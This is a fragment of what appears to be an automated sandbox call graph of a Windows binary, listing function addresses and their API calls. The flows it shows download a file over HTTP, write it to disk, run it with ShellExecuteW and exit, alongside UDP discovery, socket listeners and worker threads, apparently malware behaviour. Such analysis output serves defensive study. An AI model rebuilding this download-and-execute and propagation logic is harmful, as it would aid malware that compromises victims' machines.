40c8ce 4574->4575 4576 40c870 3 API calls 4575->4576 4577 40c8de 4576->4577 4578 40c870 3 API calls 4577->4578 4579 4083ef 4578->4579 4580 40dbb0 4579->4580 4581 40a740 7 API calls 4580->4581 4582 40dbbb 4581->4582 4583 4083f9 4582->4583 4584 40dbc7 InitializeCriticalSection 4582->4584 4585 40bc70 InitializeCriticalSection 4583->4585 4584->4583 4596 40bc8a 4585->4596 4586 40bcb9 CreateFileW 4588 40bce0 CreateFileMappingW 4586->4588 4589 40bd8e 4586->4589 4588->4589 4590 40bd01 MapViewOfFile 4588->4590 5333 40b510 EnterCriticalSection 4589->5333 4590->4589 4593 40bd1c GetFileSize 4590->4593 4600 40bd3b 4593->4600 4594 40bda7 4595 40dbe0 330 API calls 4594->4595 4597 408403 4595->4597 4596->4586 5285 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4596->5285 5286 40b850 4596->5286 4602 40dbe0 4597->4602 4598 40bd84 UnmapViewOfFile 4598->4589 4600->4598 4601 40b850 31 API calls 4600->4601 5336 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4600->5336 4601->4600 4603 40dbf7 EnterCriticalSection 4602->4603 4604 40841c 4602->4604 5361 40dcd0 4603->5361 4604->4528 4607 40dcbb LeaveCriticalSection 4607->4604 4608 40a990 9 API calls 4609 40dc39 4608->4609 4609->4607 4610 40dc4b CreateThread 4609->4610 4610->4607 4611 40dc6e 4610->4611 5365 40bdd0 4610->5365 5371 40dfd0 4610->5371 5381 401f50 GetQueuedCompletionStatus 4610->5381 5388 40e070 4610->5388 5394 40d980 4610->5394 5401 401920 GetTickCount WaitForSingleObject 4610->5401 5424 40d930 4610->5424 4612 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle 4611->4612 4613 40dcb4 4611->4613 4612->4613 4613->4607 4615 40dd86 InterlockedExchangeAdd 4614->4615 4616 40de69 GetCurrentThread SetThreadPriority 4614->4616 4615->4616 4618 40dda0 4615->4618 4616->4535 4617 40ddb9 EnterCriticalSection 4617->4618 4618->4616 4618->4617 4619 40de27 LeaveCriticalSection 4618->4619 4620 40de03 WaitForSingleObject 4618->4620 4621 40de5c Sleep 4618->4621 4622 40de3e 4618->4622 4619->4618 4619->4622 4620->4618 4621->4618 4622->4616 4624 407a28 4623->4624 4624->4471 4624->4472 4626 40f471 ShellExecuteW 4625->4626 4627 40f462 Sleep 4625->4627 4629 40f4a6 4626->4629 4630 40f497 Sleep 4626->4630 4628 407b16 4627->4628 4628->4485 4628->4501 4629->4628 4630->4628 4632 40df12 4631->4632 4633 40de9c EnterCriticalSection 4631->4633 4632->4515 4634 40deb8 LeaveCriticalSection DeleteCriticalSection 4633->4634 4636 40ab60 __aligned_recalloc_base 3 API calls 4634->4636 4637 40df06 4636->4637 4638 40ab60 __aligned_recalloc_base 3 API calls 4637->4638 4638->4632 4642 40cda0 4639->4642 4643 40cdd3 4642->4643 4644 40cdbe 4642->4644 4647 408317 4643->4647 4648 40cf80 4643->4648 4682 40ce00 4644->4682 4647->4512 4647->4515 4649 40cfa9 4648->4649 4650 40d05a 4648->4650 4681 40d052 4649->4681 4708 40a740 4649->4708 4653 40a740 7 API calls 4650->4653 4650->4681 4654 40d07e 4653->4654 4656 402420 7 API calls 4654->4656 4654->4681 4658 40d0a2 4656->4658 4661 40a740 7 API calls 4658->4661 4659 40a740 7 API calls 4660 40cff2 4659->4660 4716 4024e0 4660->4716 4663 40d0b1 4661->4663 4665 4024e0 10 API calls 4663->4665 4664 40d01b 4719 40ab60 4664->4719 4667 40d0da 4665->4667 4669 40ab60 __aligned_recalloc_base 3 API calls 4667->4669 4671 40d0e6 4669->4671 4670 402420 7 API calls 4672 40d038 4670->4672 4673 402420 7 API calls 4671->4673 4674 4024e0 10 API calls 4672->4674 4675 40d0f7 4673->4675 4674->4681 4676 4024e0 10 API calls 4675->4676 4677 40d111 4676->4677 4678 402420 7 API calls 4677->4678 4679 40d122 4678->4679 4680 4024e0 10 API calls 4679->4680 4680->4681 4681->4647 4683 40ceb2 4682->4683 4684 40ce29 4682->4684 4687 40a740 7 API calls 4683->4687 4707 40ceaa 4683->4707 4685 40a740 7 API calls 4684->4685 4684->4707 4686 40ce3c 4685->4686 4689 402420 7 API calls 4686->4689 4686->4707 4688 40ced8 4687->4688 4690 402420 7 API calls 4688->4690 4688->4707 4691 40ce65 4689->4691 4692 40cf05 4690->4692 4693 4024e0 10 API calls 4691->4693 4694 4024e0 10 API calls 4692->4694 4695 40ce7f 4693->4695 4696 40cf1f 4694->4696 4697 402420 7 API calls 4695->4697 4698 402420 7 API calls 4696->4698 4699 40ce90 4697->4699 4700 40cf30 4698->4700 4701 4024e0 10 API calls 4699->4701 4702 4024e0 10 API calls 4700->4702 4701->4707 4703 40cf4a 4702->4703 4704 402420 7 API calls 4703->4704 4705 40cf5b 4704->4705 4706 4024e0 10 API calls 4705->4706 4706->4707 4707->4647 4726 40a760 4708->4726 4711 402420 4747 40a950 4711->4747 4754 402540 4716->4754 4718 4024ff __aligned_recalloc_base 4718->4664 4764 40a800 GetCurrentProcessId 4719->4764 4721 40ab6b 4722 40ab72 4721->4722 4765 40aaa0 4721->4765 4722->4670 4725 40ab87 HeapFree 4725->4722 4735 40a800 GetCurrentProcessId 4726->4735 4728 40a76b 4729 40a777 __aligned_recalloc_base 4728->4729 4736 40a820 4728->4736 4731 40a74e 4729->4731 4732 40a792 RtlAllocateHeap 4729->4732 4731->4681 4731->4711 4732->4731 4733 40a7b9 __aligned_recalloc_base 4732->4733 4733->4731 4734 40a7d4 memset 4733->4734 4734->4731 4735->4728 4744 40a800 GetCurrentProcessId 4736->4744 4738 40a829 4739 40a846 HeapCreate 4738->4739 4745 40a890 GetProcessHeaps 4738->4745 4740 40a860 HeapSetInformation GetCurrentProcessId 4739->4740 4741 40a887 4739->4741 4740->4741 4741->4729 4744->4738 4746 40a83c 4745->4746 4746->4739 4746->4741 4748 40a760 __aligned_recalloc_base 7 API calls 4747->4748 4749 40242b 4748->4749 4750 402820 4749->4750 4751 40282a 4750->4751 4752 40a950 __aligned_recalloc_base 7 API calls 4751->4752 4753 402438 4752->4753 4753->4659 4755 40258e 4754->4755 4757 402551 4754->4757 4756 40a950 __aligned_recalloc_base 7 API calls 4755->4756 4755->4757 4760 4025b2 _invalid_parameter 4756->4760 4757->4718 4758 4025e2 memcpy 4759 402606 _invalid_parameter 4758->4759 4761 40ab60 __aligned_recalloc_base 3 API calls 4759->4761 4760->4758 4762 40ab60 __aligned_recalloc_base 3 API calls 4760->4762 4761->4757 4763 4025df 4762->4763 4763->4758 4764->4721 4766 40aad0 HeapValidate 4765->4766 4767 40aaf0 4765->4767 4766->4767 4767->4722 4767->4725 4785 40abd0 4768->4785 4771 40d211 4771->4549 4774 40ab60 __aligned_recalloc_base 3 API calls 4774->4771 4998 40a990 4775->4998 4778 405d6a memcpy 4779 40abd0 8 API calls 4778->4779 4780 405da1 4779->4780 5008 40cb40 4780->5008 4783 405e28 4783->4549 4786 40abfd 4785->4786 4787 40a950 __aligned_recalloc_base 7 API calls 4786->4787 4788 40ac12 4786->4788 4789 40ac14 memcpy 4786->4789 4787->4786 4788->4771 4790 40c6e0 4788->4790 4789->4786 4792 40c6ea 4790->4792 4794 40c721 memcmp 4792->4794 4795 40c748 4792->4795 4797 40ab60 __aligned_recalloc_base 3 API calls 4792->4797 4798 40c709 4792->4798 4799 40cbd0 4792->4799 4813 4084a0 4792->4813 4794->4792 4796 40ab60 __aligned_recalloc_base 3 API calls 4795->4796 4796->4798 4797->4792 4798->4771 4798->4774 4800 40cbdf __aligned_recalloc_base 4799->4800 4801 40a950 __aligned_recalloc_base 7 API calls 4800->4801 4812 40cbe9 4800->4812 4802 40cc78 4801->4802 4803 402420 7 API calls 4802->4803 4802->4812 4804 40cc8d 4803->4804 4805 402420 7 API calls 4804->4805 4806 40cc95 4805->4806 4808 40cced __aligned_recalloc_base 4806->4808 4816 40cd40 4806->4816 4821 402470 4808->4821 4811 402470 3 API calls 4811->4812 4812->4792 4929 40a6c0 4813->4929 4817 4024e0 10 API calls 4816->4817 4818 40cd54 4817->4818 4827 4026f0 4818->4827 4820 40cd6c 4820->4806 4822 4024ce 4821->4822 4825 402484 _invalid_parameter 4821->4825 4822->4811 4823 4024ac 4824 40ab60 __aligned_recalloc_base 3 API calls 4823->4824 4824->4822 4825->4823 4826 40ab60 __aligned_recalloc_base 3 API calls 4825->4826 4826->4823 4830 402710 4827->4830 4829 40270a 4829->4820 4831 402724 4830->4831 4832 402540 __aligned_recalloc_base 10 API calls 4831->4832 4833 40276d 4832->4833 4834 402540 __aligned_recalloc_base 10 API calls 4833->4834 4835 40277d 4834->4835 4836 402540 __aligned_recalloc_base 10 API calls 4835->4836 4837 40278d 4836->4837 4838 402540 __aligned_recalloc_base 10 API calls 4837->4838 4839 40279d 4838->4839 4840 4027a6 4839->4840 4841 4027cf 4839->4841 4845 403e20 4840->4845 4862 403df0 4841->4862 4844 4027c7 __aligned_recalloc_base 4844->4829 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 403e37 4846->4847 4848 402820 _invalid_parameter 7 API calls 4847->4848 4849 403e46 4848->4849 4850 402820 _invalid_parameter 7 API calls 4849->4850 4851 403e55 4850->4851 4852 402820 _invalid_parameter 7 API calls 4851->4852 4861 403e64 _invalid_parameter __aligned_recalloc_base 4852->4861 4854 40400f _invalid_parameter 4855 402850 _invalid_parameter 3 API calls 4854->4855 4856 404035 _invalid_parameter 4854->4856 4855->4854 4857 402850 _invalid_parameter 3 API calls 4856->4857 4858 40405b _invalid_parameter 4856->4858 4857->4856 4859 402850 _invalid_parameter 3 API calls 4858->4859 4860 404081 4858->4860 4859->4858 4860->4844 4861->4854 4865 402850 4861->4865 4869 404090 4862->4869 4864 403e0c 4864->4844 4866 402866 4865->4866 4867 40285b 4865->4867 4866->4861 4868 40ab60 __aligned_recalloc_base 3 API calls 4867->4868 4868->4866 4870 4040a6 _invalid_parameter 4869->4870 4871 4040dd 4870->4871 4873 4040b8 _invalid_parameter 4870->4873 4874 404103 4870->4874 4899 403ca0 4871->4899 4873->4864 4875 40413d 4874->4875 4876 40415e 4874->4876 4909 404680 4875->4909 4877 402820 _invalid_parameter 7 API calls 4876->4877 4879 40416f 4877->4879 4880 402820 _invalid_parameter 7 API calls 4879->4880 4881 40417e 4880->4881 4882 402820 _invalid_parameter 7 API calls 4881->4882 4883 40418d 4882->4883 4884 402820 _invalid_parameter 7 API calls 4883->4884 4885 40419c 4884->4885 4922 403d70 4885->4922 4887 402820 _invalid_parameter 7 API calls 4888 4041ca _invalid_parameter 4887->4888 4888->4887 4891 404284 _invalid_parameter __aligned_recalloc_base 4888->4891 4889 402850 _invalid_parameter 3 API calls 4889->4891 4890 4045a3 _invalid_parameter 4892 402850 _invalid_parameter 3 API calls 4890->4892 4893 4045c9 _invalid_parameter 4890->4893 4891->4889 4891->4890 4892->4890 4894 402850 _invalid_parameter 3 API calls 4893->4894 4895 4045ef _invalid_parameter 4893->4895 4894->4893 4896 402850 _invalid_parameter 3 API calls 4895->4896 4897 404615 _invalid_parameter 4895->4897 4896->4895 4897->4873 4898 402850 _invalid_parameter 3 API calls 4897->4898 4898->4897 4900 403cae 4899->4900 4901 402820 _invalid_parameter 7 API calls 4900->4901 4902 403ccb 4901->4902 4903 402820 _invalid_parameter 7 API calls 4902->4903 4904 403cda _invalid_parameter 4903->4904 4905 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4904->4905 4907 403d3a _invalid_parameter 4904->4907 4905->4904 4906 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4906->4907 4907->4906 4908 403d60 4907->4908 4908->4873 4910 402820 _invalid_parameter 7 API calls 4909->4910 4911 404697 4910->4911 4912 402820 _invalid_parameter 7 API calls 4911->4912 4913 4046a6 4912->4913 4914 402820 _invalid_parameter 7 API calls 4913->4914 4921 4046b5 _invalid_parameter __aligned_recalloc_base 4914->4921 4915 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4915->4921 4916 404841 _invalid_parameter 4917 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4916->4917 4918 404867 _invalid_parameter 4916->4918 4917->4916 4919 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4918->4919 4920 40488d 4918->4920 4919->4918 4920->4873 4921->4915 4921->4916 4923 402820 _invalid_parameter 7 API calls 4922->4923 4924 403d7f _invalid_parameter 4923->4924 4925 403ca0 _invalid_parameter 9 API calls 4924->4925 4927 403db8 _invalid_parameter 4925->4927 4926 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4926->4927 4927->4926 4928 403de3 4927->4928 4928->4888 4930 40a6d2 4929->4930 4933 40a620 4930->4933 4934 40a950 __aligned_recalloc_base 7 API calls 4933->4934 4941 40a630 4934->4941 4937 40ab60 __aligned_recalloc_base 3 API calls 4939 4084bf 4937->4939 4938 40a66c 4938->4937 4939->4792 4941->4938 4941->4939 4942 409b50 4941->4942 4949 40a140 4941->4949 4954 40a510 4941->4954 4943 409b63 4942->4943 4948 409b59 4942->4948 4944 409ba6 memset 4943->4944 4943->4948 4945 409bc7 4944->4945 4944->4948 4946 409bcd memcpy 4945->4946 4945->4948 4962 409920 4946->4962 4948->4941 4950 40a14d 4949->4950 4951 40a157 4949->4951 4950->4941 4951->4950 4952 40a24f memcpy 4951->4952 4967 409e70 4951->4967 4952->4951 4956 40a526 4954->4956 4960 40a51c 4954->4960 4955 409e70 64 API calls 4957 40a5a7 4955->4957 4956->4955 4956->4960 4958 409920 6 API calls 4957->4958 4957->4960 4959 40a5c6 4958->4959 4959->4960 4961 40a5db memcpy 4959->4961 4960->4941 4961->4960 4963 40996e 4962->4963 4965 40992e 4962->4965 4963->4948 4965->4963 4966 409860 6 API calls 4965->4966 4966->4965 4968 409e8a 4967->4968 4970 409e80 4967->4970 4968->4970 4977 409cb0 4968->4977 4970->4951 4972 409fc8 memcpy 4972->4970 4974 409fe7 memcpy 4975 40a111 4974->4975 4976 409e70 62 API calls 4975->4976 4976->4970 4978 409cc7 4977->4978 4986 409cbd 4977->4986 4980 409d55 4978->4980 4981 409d38 4978->4981 4985 409d50 4978->4985 4978->4986 4982 409920 6 API calls 4980->4982 4984 409920 6 API calls 4981->4984 4982->4985 4984->4985 4988 409610 4985->4988 4986->4970 4986->4972 4986->4974 4987 409dfc memset 4987->4986 4989 40961f 4988->4989 4990 409629 4988->4990 4989->4986 4989->4987 4990->4989 4991 4094e0 9 API calls 4990->4991 4992 409722 4991->4992 4993 40a950 __aligned_recalloc_base 7 API calls 4992->4993 4994 409771 4993->4994 4994->4989 4995 409350 46 API calls 4994->4995 4996 40979e 4995->4996 4997 40ab60 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4996->4997 4997->4989 5017 40a800 GetCurrentProcessId 4998->5017 5000 40a99b 5001 40a820 __aligned_recalloc_base 5 API calls 5000->5001 5006 40a9a7 __aligned_recalloc_base 5000->5006 5001->5006 5002 405d55 5002->4778 5002->4783 5003 40aa50 HeapAlloc 5003->5006 5004 40aa1a HeapReAlloc 5004->5006 5005 40aaa0 __aligned_recalloc_base HeapValidate 5005->5006 5006->5002 5006->5003 5006->5004 5006->5005 5007 40ab60 __aligned_recalloc_base 3 API calls 5006->5007 5007->5006 5011 40cb4b 5008->5011 5009 40a950 __aligned_recalloc_base 7 API calls 5009->5011 5010 405ded 5010->4783 5012 4076c0 5010->5012 5011->5009 5011->5010 5013 40a950 __aligned_recalloc_base 7 API calls 5012->5013 5014 4076d0 5013->5014 5015 407717 5014->5015 5016 4076dc memcpy CreateThread 5014->5016 5015->4783 5016->5015 5018 407720 GetTickCount srand rand Sleep 5016->5018 5017->5000 5019 407757 5018->5019 5020 4077ad 5018->5020 5021 4077ab 5019->5021 5024 407766 StrChrA 5019->5024 5028 40f560 9 API calls 5019->5028 5020->5021 5022 40f560 58 API calls 5020->5022 5023 40ab60 __aligned_recalloc_base 3 API calls 5021->5023 5022->5021 5025 4077d8 5023->5025 5024->5019 5029 40f623 InternetOpenUrlW 5028->5029 5030 40f78e InternetCloseHandle Sleep 5028->5030 5033 40f781 InternetCloseHandle 5029->5033 5034 40f652 CreateFileW 5029->5034 5031 40f7b5 6 API calls 5030->5031 5032 407795 Sleep 5030->5032 5031->5032 5035 40f831 wsprintfW DeleteFileW Sleep 5031->5035 5032->5019 5033->5030 5036 40f681 InternetReadFile 5034->5036 5055 40f75e 5034->5055 5039 40f240 18 API calls 5035->5039 5037 40f6d4 wsprintfW DeleteFileW Sleep 5036->5037 5038 40f6a5 5036->5038 5057 40f240 CreateFileW 5037->5057 5038->5037 5040 40f6ae WriteFile 5038->5040 5041 40f871 5039->5041 5040->5036 5043 40f87b Sleep 5041->5043 5044 40f8af DeleteFileW 5041->5044 5046 40f400 6 API calls 5043->5046 5044->5032 5050 40f892 5046->5050 5048 40f767 DeleteFileW 5048->5055 5049 40f72b Sleep 5052 40f400 6 API calls 5049->5052 5051 40f8ad 5050->5051 5053 40f8a5 ExitProcess 5050->5053 5051->5032 5054 40f742 5052->5054 5054->5055 5056 40f756 ExitProcess 5054->5056 5055->5033 5058 40f285 CreateFileMappingW 5057->5058 5059 40f386 5057->5059 5058->5059 5061 40f2a6 MapViewOfFile 5058->5061 5060 40f3a0 CreateFileW 5059->5060 5069 40f3f1 5059->5069 5063 40f3c2 WriteFile 5060->5063 5064 40f3e8 5060->5064 5061->5059 5062 40f2c5 GetFileSize 5061->5062 5065 40f2e1 5062->5065 5066 40f37c UnmapViewOfFile 5062->5066 5063->5064 5067 40ab60 __aligned_recalloc_base 3 API calls 5064->5067 5077 40d1a0 5065->5077 5066->5059 5067->5069 5069->5048 5069->5049 5071 40cb40 7 API calls 5072 40f330 5071->5072 5072->5066 5073 40f34d memcmp 5072->5073 5073->5066 5074 40f369 5073->5074 5075 40ab60 __aligned_recalloc_base 3 API calls 5074->5075 5076 40f372 5075->5076 5076->5066 5078 40cbd0 10 API calls 5077->5078 5079 40d1c4 5078->5079 5079->5066 5079->5071 5081 40e2ee 5080->5081 5082 40e1bd htons inet_addr setsockopt 5080->5082 5081->4555 5083 40b430 8 API calls 5082->5083 5084 40e236 bind lstrlenA sendto ioctlsocket 5083->5084 5088 40e28b 5084->5088 5085 40e2b2 5137 40b4f0 shutdown closesocket 5085->5137 5088->5085 5089 40a990 9 API calls 5088->5089 5128 40e310 5088->5128 5089->5088 5144 40e640 memset InternetCrackUrlA InternetOpenA 5090->5144 5093 40e51e 5093->4555 5095 40e4eb 5096 40ab60 __aligned_recalloc_base 3 API calls 5095->5096 5096->5093 5102 40e4e1 SysFreeString 5102->5095 5251 40b3f0 inet_addr 5105->5251 5108 40b4dd 5113 40eef0 5108->5113 5109 40b48c connect 5110 40b4a0 getsockname 5109->5110 5111 40b4d4 5109->5111 5110->5111 5254 40b4f0 shutdown closesocket 5111->5254 5255 40b3d0 inet_ntoa 5113->5255 5115 40ef06 5116 40d470 11 API calls 5115->5116 5117 40ef25 5116->5117 5123 40e14c 5117->5123 5256 40ef70 memset InternetCrackUrlA InternetOpenA 5117->5256 5120 40ef5c 5122 40ab60 __aligned_recalloc_base 3 API calls 5120->5122 5121 40ab60 __aligned_recalloc_base 3 API calls 5121->5120 5122->5123 5123->4564 5127 40ac84 5124->5127 5125 40ac8a 5125->4556 5126 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5126->5127 5127->5125 5127->5126 5133 40e32c 5128->5133 5129 40e3f4 5129->5088 5130 40e348 recvfrom 5131 40e376 StrCmpNIA 5130->5131 5132 40e369 Sleep 5130->5132 5131->5133 5134 40e395 StrStrIA 5131->5134 5132->5133 5133->5129 5133->5130 5134->5133 5135 40e3b6 StrChrA 5134->5135 5138 40d320 5135->5138 5137->5081 5139 40d32b 5138->5139 5140 40d331 lstrlenA 5139->5140 5141 40a950 __aligned_recalloc_base 7 API calls 5139->5141 5142 40d360 memcpy 5139->5142 5143 40d344 5139->5143 5140->5139 5140->5143 5141->5139 5142->5139 5142->5143 5143->5133 5145 40e6e1 InternetConnectA 5144->5145 5146 40e41a 5144->5146 5147 40e84a InternetCloseHandle 5145->5147 5148 40e71a HttpOpenRequestA 5145->5148 5146->5093 5157 40e530 5146->5157 5147->5146 5149 40e750 HttpSendRequestA 5148->5149 5150 40e83d InternetCloseHandle 5148->5150 5151 40e830 InternetCloseHandle 5149->5151 5154 40e76d 5149->5154 5150->5147 5151->5150 5152 40e7bb 5152->5151 5153 40e78e InternetReadFile 5153->5152 5153->5154 5154->5152 5154->5153 5155 40a990 9 API calls 5154->5155 5156 40e7d6 memcpy 5155->5156 5156->5154 5186 40d250 5157->5186 5160 40e433 5160->5095 5167 40eea0 5160->5167 5161 40e55a SysAllocString 5162 40e571 CoCreateInstance 5161->5162 5163 40e627 5161->5163 5164 40e61d SysFreeString 5162->5164 5166 40e596 5162->5166 5165 40ab60 __aligned_recalloc_base 3 API calls 5163->5165 5164->5163 5165->5160 5166->5164 5203 40e9f0 5167->5203 5170 40e870 5208 40ecc0 5170->5208 5175 40ee20 6 API calls 5176 40e8c7 5175->5176 5181 40e4b2 5176->5181 5225 40eae0 5176->5225 5179 40e8ff 5179->5181 5230 40e990 5179->5230 5180 40eae0 6 API calls 5180->5179 5181->5102 5183 40d470 5181->5183 5246 40d3e0 5183->5246 5190 40d25d 5186->5190 5187 40d263 lstrlenA 5188 40d276 5187->5188 5187->5190 5188->5160 5188->5161 5190->5187 5190->5188 5191 40a950 __aligned_recalloc_base 7 API calls 5190->5191 5193 40ab60 __aligned_recalloc_base 3 API calls 5190->5193 5194 405740 5190->5194 5198 4056f0 5190->5198 5191->5190 5193->5190 5195 405757 MultiByteToWideChar 5194->5195 5196 40574a lstrlenA 5194->5196 5197 40577c 5195->5197 5196->5195 5197->5190 5199 4056fb 5198->5199 5200 405701 lstrlenA 5199->5200 5201 405740 2 API calls 5199->5201 5202 405737 5199->5202 5200->5199 5201->5199 5202->5190 5204 40ea16 5203->5204 5205 40ea93 lstrcmpiW 5204->5205 5206 40e49d 5204->5206 5207 40eaab SysFreeString 5204->5207 5205->5204 5205->5207 5206->5095 5206->5170 5207->5204 5209 40ece6 5208->5209 5210 40e88b 5209->5210 5211 40ed73 lstrcmpiW 5209->5211 5210->5181 5220 40ee20 5210->5220 5212 40edf3 SysFreeString 5211->5212 5213 40ed86 5211->5213 5212->5210 5214 40e990 2 API calls 5213->5214 5216 40ed94 5214->5216 5215 40ede5 5215->5212 5216->5212 5216->5215 5217 40edc3 lstrcmpiW 5216->5217 5218 40edd5 5217->5218 5219 40eddb SysFreeString 5217->5219 5218->5219 5219->5215 5221 40e990 2 API calls 5220->5221 5223 40ee3b 5221->5223 5222 40e8a9 5222->5175 5222->5181 5223->5222 5224 40ecc0 6 API calls 5223->5224 5224->5222 5226 40e990 2 API calls 5225->5226 5228 40eafb 5226->5228 5227 40e8e5 5227->5179 5227->5180 5228->5227 5234 40eb60 5228->5234 5232 40e9b6 5230->5232 5231 40e9cd 5231->5181 5232->5231 5233 40e9f0 2 API calls 5232->5233 5233->5231 5236 40eb86 5234->5236 5235 40ec9d 5235->5227 5236->5235 5237 40ec13 lstrcmpiW 5236->5237 5238 40ec93 SysFreeString 5237->5238 5239 40ec26 5237->5239 5238->5235 5240 40e990 2 API calls 5239->5240 5242 40ec34 5240->5242 5241 40ec85 5241->5238 5242->5238 5242->5241 5243 40ec63 lstrcmpiW 5242->5243 5244 40ec75 5243->5244 5245 40ec7b SysFreeString 5243->5245 5244->5245 5245->5241 5250 40d3ed 5246->5250 5247 40d390 _vscprintf wvsprintfA 5247->5250 5248 40d408 SysFreeString 5248->5102 5249 40a990 9 API calls 5249->5250 5250->5247 5250->5248 5250->5249 5252 40b409 gethostbyname 5251->5252 5253 40b41c socket 5251->5253 5252->5253 5253->5108 5253->5109 5254->5108 5255->5115 5257 40ef47 5256->5257 5258 40f014 InternetConnectA 5256->5258 5257->5120 5257->5121 5259 40f194 InternetCloseHandle 5258->5259 5260 40f04d HttpOpenRequestA 5258->5260 5259->5257 5261 40f083 HttpAddRequestHeadersA HttpSendRequestA 5260->5261 5262 40f187 InternetCloseHandle 5260->5262 5263 40f17a InternetCloseHandle 5261->5263 5266 40f0cd 5261->5266 5262->5259 5263->5262 5264 40f0e4 InternetReadFile 5265 40f111 5264->5265 5264->5266 5265->5263 5266->5264 5266->5265 5267 40a990 9 API calls 5266->5267 5268 40f12c memcpy 5267->5268 5268->5266 5275 407417 5269->5275 5270 407670 CoCreateInstance 5270->5275 5271 4075eb 5273 4075f4 SysFreeString 5271->5273 5274 4073bb SysFreeString 5271->5274 5272 40ab60 __aligned_recalloc_base 3 API calls 5272->5271 5273->5274 5274->4568 5275->5270 5276 407566 SysAllocString 5275->5276 5277 407432 5275->5277 5276->5275 5276->5277 5277->5271 5277->5272 5279 40c87a 5278->5279 5280 40c87e 5278->5280 5279->4574 5282 40c830 CryptAcquireContextW 5280->5282 5283 40c86b 5282->5283 5284 40c84d CryptGenRandom CryptReleaseContext 5282->5284 5283->5279 5284->5283 5285->4596 5337 40b780 gethostname 5286->5337 5289 40b869 5289->4596 5291 40b87c strcmp 5291->5289 5292 40b891 5291->5292 5341 40b3d0 inet_ntoa 5292->5341 5294 40b89f strstr 5295 40b8f0 5294->5295 5296 40b8af 5294->5296 5342 40b3d0 inet_ntoa 5295->5342 5344 40b3d0 inet_ntoa 5296->5344 5299 40b8bd strstr 5299->5289 5301 40b8cd 5299->5301 5300 40b8fe strstr 5302 40b90e 5300->5302 5303 40b94f 5300->5303 5345 40b3d0 inet_ntoa 5301->5345 5346 40b3d0 inet_ntoa 5302->5346 5343 40b3d0 inet_ntoa 5303->5343 5307 40b95d strstr 5310 40b96d 5307->5310 5311 40b9ae EnterCriticalSection 5307->5311 5308 40b8db strstr 5308->5289 5308->5295 5309 40b91c strstr 5309->5289 5312 40b92c 5309->5312 5348 40b3d0 inet_ntoa 5310->5348 5314 40b9c6 5311->5314 5347 40b3d0 inet_ntoa 5312->5347 5322 40b9f1 5314->5322 5350 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5314->5350 5316 40b97b strstr 5316->5289 5318 40b98b 5316->5318 5317 40b93a strstr 5317->5289 5317->5303 5349 40b3d0 inet_ntoa 5318->5349 5321 40baea LeaveCriticalSection 5321->5289 5322->5321 5324 40a740 7 API calls 5322->5324 5323 40b999 strstr 5323->5289 5323->5311 5325 40ba35 5324->5325 5325->5321 5351 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5325->5351 5327 40ba53 5328 40ba80 5327->5328 5329 40ba76 Sleep 5327->5329 5331 40baa5 5327->5331 5330 40ab60 __aligned_recalloc_base 3 API calls 5328->5330 5329->5327 5330->5331 5331->5321 5352 40b530 5331->5352 5334 40b530 13 API calls 5333->5334 5335 40b523 LeaveCriticalSection 5334->5335 5335->4594 5336->4600 5338 40b7a7 gethostbyname 5337->5338 5339 40b7c3 5337->5339 5338->5339 5339->5289 5340 40b3d0 inet_ntoa 5339->5340 5340->5291 5341->5294 5342->5300 5343->5307 5344->5299 5345->5308 5346->5309 5347->5317 5348->5316 5349->5323 5350->5322 5351->5327 5353 40b544 5352->5353 5360 40b53f 5352->5360 5354 40a950 __aligned_recalloc_base 7 API calls 5353->5354 5356 40b558 5354->5356 5355 40b5b4 CreateFileW 5357 40b603 InterlockedExchange 5355->5357 5358 40b5d7 WriteFile FlushFileBuffers 5355->5358 5356->5355 5356->5360 5359 40ab60 __aligned_recalloc_base 3 API calls 5357->5359 5358->5357 5359->5360 5360->5321 5364 40dcdd 5361->5364 5362 40dc13 5362->4607 5362->4608 5363 40dd01 WaitForSingleObject 5363->5364 5364->5362 5364->5363 5366 40bdd3 WaitForSingleObject 5365->5366 5367 40be01 5366->5367 5368 40bdeb InterlockedDecrement 5366->5368 5369 40bdfa 5368->5369 5369->5366 5370 40b510 15 API calls 5369->5370 5370->5369 5430 4013b0 5371->5430 5374 40dff7 InterlockedExchangeAdd 5375 40e03b WaitForSingleObject 5374->5375 5377 40dfdd 5374->5377 5376 40e054 5375->5376 5375->5377 5450 401330 5376->5450 5377->5374 5377->5375 5380 40e05d 5377->5380 5442 40bbb0 EnterCriticalSection 5377->5442 5447 40bed0 5377->5447 5382 401f92 5381->5382 5383 402008 5381->5383 5384 401f97 WSAGetOverlappedResult 5382->5384 5529 401d60 5382->5529 5384->5382 5385 401fb9 WSAGetLastError 5384->5385 5385->5382 5387 401fd3 GetQueuedCompletionStatus 5387->5382 5387->5383 5570 401470 5388->5570 5390 40e084 5391 40e0af 5390->5391 5392 40e095 WaitForSingleObject 5390->5392 5393 401330 7 API calls 5392->5393 5393->5391 5584 4021b0 5394->5584 5397 40d9c2 5398 40d9a5 WaitForSingleObject 5588 401600 5398->5588 5402 401ac9 5401->5402 5403 40194d WSAWaitForMultipleEvents 5401->5403 5404 4019f0 GetTickCount 5403->5404 5405 40196a WSAEnumNetworkEvents 5403->5405 5406 401a43 GetTickCount 5404->5406 5407 401a05 EnterCriticalSection 5404->5407 5405->5404 5420 401983 5405->5420 5410 401ab5 WaitForSingleObject 5406->5410 5411 401a4e EnterCriticalSection 5406->5411 5408 401a16 5407->5408 5409 401a3a LeaveCriticalSection 5407->5409 5415 401a29 LeaveCriticalSection 5408->5415 5652 401820 5408->5652 5409->5410 5410->5402 5410->5403 5413 401aa1 LeaveCriticalSection GetTickCount 5411->5413 5414 401a5f InterlockedExchangeAdd 5411->5414 5412 401992 accept 5412->5404 5412->5420 5413->5410 5670 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5414->5670 5415->5410 5419 401a72 5419->5413 5419->5414 